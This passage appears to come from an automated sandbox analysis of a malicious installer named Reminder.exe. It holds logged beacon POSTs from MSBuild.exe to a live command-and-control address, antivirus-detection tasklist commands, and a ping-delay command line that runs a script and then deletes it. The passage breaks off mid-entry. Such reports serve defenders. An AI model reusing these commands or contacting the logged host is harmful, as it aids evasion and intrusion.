                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:54.997221947 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0
                                                                                                Oct 27, 2024 17:11:54.999809027 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                22192.168.2.457999152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:56.628777027 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:57.533793926 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:57 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                23192.168.2.458000152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:59.044260979 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:11:59.950566053 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                24192.168.2.458001152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:12:01.608752966 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:12:02.503149986 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:12:02 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                25192.168.2.458002152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:12:04.029129982 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:12:04.953649998 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:12:04 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                26192.168.2.458003152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:12:06.594054937 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:12:07.455554962 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:12:07 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                27192.168.2.458004152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:12:08.968569994 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
                                                                                                Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                                                                                                Oct 27, 2024 17:12:09.870383978 CET196INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:12:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7 <c><d>0


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:12:10:02
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Users\user\Desktop\Reminder.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Reminder.exe"
                                                                                                Imagebase:0x860000
                                                                                                File size:5'563'800 bytes
                                                                                                MD5 hash:DF45696EF1463F335A6CC5DC72C607D0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:12:10:02
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe"
                                                                                                Imagebase:0xa40000
                                                                                                File size:3'366'912 bytes
                                                                                                MD5 hash:45CC5C19328748F850CC9FE5E65AC9F3
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:12:10:03
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Users\user\Desktop\Reminder.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
                                                                                                Imagebase:0x860000
                                                                                                File size:5'563'800 bytes
                                                                                                MD5 hash:DF45696EF1463F335A6CC5DC72C607D0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:12:10:03
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
                                                                                                Imagebase:0xca0000
                                                                                                File size:3'366'912 bytes
                                                                                                MD5 hash:45CC5C19328748F850CC9FE5E65AC9F3
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:12:10:04
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                Imagebase:0x7ff74c9e0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:12:10:04
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:12:10:04
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                Imagebase:0x7ff6fb7a0000
                                                                                                File size:106'496 bytes
                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:12:10:04
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:find /I "wrsa.exe"
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:17'920 bytes
                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:8
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                Imagebase:0x7ff74c9e0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:9
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                Imagebase:0x7ff6fb7a0000
                                                                                                File size:106'496 bytes
                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:11
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:find /I "opssvc.exe"
                                                                                                Imagebase:0x7ff7b5b80000
                                                                                                File size:17'920 bytes
                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:12
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                Imagebase:0x7ff74c9e0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:13
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:14
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                Imagebase:0x7ff6fb7a0000
                                                                                                File size:106'496 bytes
                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:15
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:find /I "avastui.exe"
                                                                                                Imagebase:0x7ff7b5b80000
                                                                                                File size:17'920 bytes
                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:16
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                Imagebase:0x7ff74c9e0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:17
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:18
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                Imagebase:0x7ff6fb7a0000
                                                                                                File size:106'496 bytes
                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:19
                                                                                                Start time:12:10:05
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:find /I "avgui.exe"
                                                                                                Imagebase:0x7ff7b5b80000
                                                                                                File size:17'920 bytes
                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:20
                                                                                                Start time:12:10:06
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                Imagebase:0x7ff74c9e0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:21
                                                                                                Start time:12:10:06
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:22
                                                                                                Start time:12:10:06
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                Imagebase:0x7ff6fb7a0000
                                                                                                File size:106'496 bytes
                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:23
                                                                                                Start time:12:10:06
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:find /I "nswscsvc.exe"
                                                                                                Imagebase:0x7ff7b5b80000
                                                                                                File size:17'920 bytes
                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:24
                                                                                                Start time:12:10:06
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                Imagebase:0x7ff74c9e0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:25
                                                                                                Start time:12:10:06
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:26
                                                                                                Start time:12:10:06
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                Imagebase:0x7ff6fb7a0000
                                                                                                File size:106'496 bytes
                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:27
                                                                                                Start time:12:10:06
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:find /I "sophoshealth.exe"
                                                                                                Imagebase:0x7ff7b5b80000
                                                                                                File size:17'920 bytes
                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:28
                                                                                                Start time:12:10:06
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Users\user\AppData\Local\friend\Updater.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv"
                                                                                                Imagebase:0x6d0000
                                                                                                File size:943'784 bytes
                                                                                                MD5 hash:3F58A517F1F4796225137E7659AD2ADB
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:32
                                                                                                Start time:12:10:50
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x
                                                                                                Imagebase:0x240000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:33
                                                                                                Start time:12:10:50
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:34
                                                                                                Start time:12:10:50
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:ping -n 5 127.0.0.1
                                                                                                Imagebase:0x7ff72bec0000
                                                                                                File size:18'944 bytes
                                                                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:35
                                                                                                Start time:12:10:54
                                                                                                Start date:27/10/2024
                                                                                                Path:C:\Users\user\AppData\Local\friend\Updater.exe
                                                                                                Wow64 process (32bit):true
